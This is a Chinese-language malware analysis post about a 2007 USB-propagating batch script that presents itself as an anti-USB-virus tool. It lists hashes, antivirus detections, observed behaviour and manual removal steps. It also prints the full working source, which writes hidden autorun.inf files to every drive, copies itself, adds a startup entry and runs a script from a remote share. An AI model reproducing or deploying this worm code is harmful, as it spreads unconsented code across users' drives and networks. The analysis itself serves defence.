幕:
样本来至卡卡社区
感谢网友“小新长大了”提供样本
=====================================
“病毒”信息:
File size: 4240 bytes
MD5: 0733a379dbec911e41db5e0f88353974
SHA1: 80dabd989c2e80892696a104ecfad07d66f06918
SHA160 : 80DABD989C2E80892696A104ECFAD07D66F06918
CRC32 : A6B4CBC2
====================================
可笑的是,这个“病毒”竟然在国际杀软竟然被加入“病毒库”,被定义为病毒.
报的有:
AntiVir 7.4.0.15 05.12.2007 BAT/VB.A
BitDefender 7.2 05.13.2007 Trojan.BAT.Agent.E
eSafe 7.0.15.0 05.10.2007 Virus.BAT.Agent.b
F-Secure 6.70.13030.0 05.11.2007 Virus.BAT.Agent.b
Ikarus T3.1.1.7 05.13.2007 Virus.BAT.Agent.b
Kaspersky 4.0.2.24 05.13.2007 Virus.BAT.Agent.b
====================================
病毒原代码(哈哈,第一次分析有原代码的病毒哈)
@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=01
set "endf=%systemdrive%\8bye.txt"
call:ie s.vbe
echo.Wscript.sleep 10000>s.vbe
attrib s.vbe +a +s +r +h
if /i not "%cd%"=="%systemroot%" (call:cb&del /a /f /q s.vbe&goto :eof)
set dl=CDEFGHIJKLMNOPQRSTUVWXYZ
set n=0
call:inf >inf.tem
call:ql
uda.a
md "%systemroot%\bakfiles\"
call:ie "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
copy uda-解压.bat "%systemroot%\bakfiles\将文件拖到本图标上以解压还原文件.bat"
call:ie "%systemroot%\bakfiles\uda.a"
call:copy uda.a "%systemroot%\bakfiles\"
:s
echo. >uhere-%v%.txt
if exist "%endf%" (set n=1&goto end)
if "!dl:~%n%,1!"=="" (set n=0&s.vbe&(ping 192.168.2.211 -n 1 &&call \\192.168.2.211\re$\add.bat))
set d=!dl:~%n%,1!:
set /a n=n+1
if not exist %d% (goto s)
if exist "%d%\autorun.inf\" (echo.y|cacls "%d%\autorun.inf" /p everyone:f
rd "%d%\autorun.inf" /s /q)
if exist "%d%\autorun.inf" (fc "%d%\autorun.inf" inf.tem&if not "!ERRORLEVEL!"=="0" (call U盘病毒分析.bat -a -l -d %d:~0,-1% -c -i -s&goto s1)) else (goto s1)
if not exist "%d%\%~n0.vbe" (goto s2)
if not exist "%d%\%~nx0" (goto s3)
if not exist "%d%\uda.a" (goto s4)
if exist %d%\%date:~0,10%.sk (goto s)
:s1
call:inf >%d%\autorun.inf
attrib %d%\autorun.inf +a +s +r +h
call:ie "%d%\%~n0.vbe"
:s2
call:vbe "%~nx0" >"%d%\%~n0.vbe"
attrib "%d%\%~n0.vbe" +a +s +r +h
:s3
call:copy "%~dpnx0" "%d%\"
:s4
call:copy "uda.a" "%d%\"
call:ie %d%\*.sk
echo.>%d%\%date:~0,10%.sk
attrib %d%\%date:~0,10%.sk +a +s +r +h
goto s
:cb
if exist "%systemroot%\uhere-*.txt" (del /a /f /q "%systemroot%\uhere-*.txt"&s.vbe)
if exist "%systemroot%\uhere-*.txt" (if exist "%systemroot%\uhere-%v%.txt" (goto :eof) else (call:v "%systemroot%\uhere-*.txt"&(if %v% lss !v0! (goto :eof))))
call:rm >%systemdrive%\已经被反U盘病毒的“病毒”感染.txt
call:copy "%~dpnx0" "%systemroot%\"
call:copy "uda.a" "%systemroot%\"
call:ie "%systemroot%\%~n0.vbe"
call:vbe "%~nx0" >"%systemroot%\%~n0.vbe"
call:ie "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
call:vbe "%systemroot%\%~nx0" >"%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe"
start "" /wait /d "%systemroot%\" "%systemroot%\%~n0.vbe"
goto :eof
:v
set "v0=%~nx1"
set /a "v0=%v0:~6,2%"
goto :eof
:rm
echo. 看到这个,请不要慌张。电脑病毒的定义为:1、传播性;2、潜伏性;3、破坏性。根据此定义,本脚本这完全符合1,有点符合2,不符合3(若说破坏性也不是没有,但只针对U盘病毒,而且会在删除文件前备份,备份地址:%systemroot%\bakfiles\),因此,病毒二字加了引号,即不是真正的病毒。本脚本的目的是通过U盘传播,并沿途清理U盘中的病毒,如果可能,会把收集到的病毒文件发给作者;不会给您造成太多不便(与其被U盘病毒感染,不如被本脚本感染啦)。如果您觉得这样给您造成了不便,想卸载本脚本,请在%systemdrive%\下新建一个名为8bye的文本文件(不需要写入内容,即:新建%endf%),大约在20秒内完成卸载,并帮助您进行U盘病毒免疫。欲了解更多,请打开 U盘病毒分析 的自述文件(地址:%systemroot%\readme.txt)。谢谢!
echo. 包含文件:u.bat(本文件,4240字节)、uda.a(21674字节,md5:e6762ebf6123bc17ab31995c61bba955)
echo. 为研究性学习而制作,于2007-03-15,望多多支持!作者:CyyIsGood(肇中高一11),联系:cyyisgood@126.com
goto :eof
:vbe
echo.wscript.create
object("wscript.shell").run """%~1"" /start",0
goto :eof
:inf
echo.[AutoRun]
echo.open=wscript.exe %~n0.vbe
echo.shell\open\Command=wscript.exe %~n0.vbe
echo.shell\explore\Command=wscript.exe %~n0.vbe
echo.shell\find\Command=wscript.exe %~n0.vbe
goto :eof
:ie
if exist "%~1" (del /a /f /q "%~1")
goto :eof
:copy
call:ie "%~dp2%~nx1"
attrib "%~1" -s -h
copy "%~1" "%~dp2"
attrib "%~1" +s +h
attrib "%~dp2%~nx1" +s +h
goto :eof
:ql
cd /d "%systemroot%\"
del /a /f /q Anti-U盘免疫.bat ReadMe.txt uda-解压.bat U盘病毒分析.bat zap.a 主操控.bat 打开发送功能.bat
cd /d "%~dp0"
goto :eof
:end
set d=!dl:~%n%,1!
echo.%d%:\
if exist %d%:\ (del /a /f /q %d%:\u.vbe %d%:\u.bat %d%:\uda.a)
set /a n=n+1
if not "!dl:~%n%,1!"=="" goto end
call U盘病毒分析.bat -c&call:ql&del /a /f /q "%systemdrive%\已经被反U盘病毒的“病毒”感染.txt" "%~dp0s.vbe" "%endf%" inf.tem "uda.a" "%~n0.vbe" "uhere-%v%.txt" "%ALLUSERSPROFILE%\「开始」菜单\程序\启动\%~n0.vbe" "%~nx0"
====================================
行为:
%windir%生成:
inf.tem,152 字节, A
s.vbe, 21 字节, RHSA
u.bat, 4240 字节, HSA
u.vbe , 64 字节, A
uhere-01.txt, 3 字节, A
(文件夹) C:\WINNT\bakfiles
还在每个分区生成:
autorun.inf = 2007-5-13 18:18, 152 字节, RHSA
u.vbe, 64 字节, A
星期日,12 字节, A
已经被反U盘病毒的“病毒”感染.txt, 862 字节, A
后台执行CMD,调用attrib和fc等.(在进程任务可见)
ping 192.168.2.211 -n 1 (这个应该是该作者的校园网内的一个网段)
发送一个小数据包,等回应(判断网络是否通)
加入
「开始」菜单\程序\启动,达到随机启动的效果
=====================================
inf.tem内容(和每个分区autorun.inf一样)
[AutoRun]
open=wscript.exe u.vbe
shell\open\Command=wscript.exe u.vbe
shell\explore\Command=wscript.exe u.vbe
shell\find\Command=wscript.exe u.vbe
双击分区后由wscript.exe调用u.vbe
u.vbe内容
wscript.create
object("wscript.shell").run """u.bat"" /start",0
运行"u.bat",见原码.
s.vbe内容
Wscript.sleep 10000
=====================================
严格说不能算是病毒,不过行为..
解决方法很简单
注意,操作前不要进入C-F盘,把工具下载到桌面先打开任务管理器,然后关闭CMD进程.
强制删除工具 PowerRMV
下载地址: http://free.ys168.com/?gudugengkekao
(其他工具-PowerRMV.com 大小101.4KB)
填入:
C:\autorun.inf
C:\windows\u.bat
D:\autorun.inf
E:\autorun.inf
F:\autorun.inf
选上抑止杀灭对象再次生成,然后杀灭
然后删除:
C:\Windows\下的
inf.tem、s.vbe、u.bat、u.vbe、uhere-01.txt
(文件夹) C:\WINNT\bakfiles
C-F下的
u.vbe、已经被反U盘病毒的“病毒”感染.txt和生成一个当天日期,我测试生成的“星期日”,一并也删除。
还有开始、菜单\程序\启动的u.vbe然后电脑重启,OK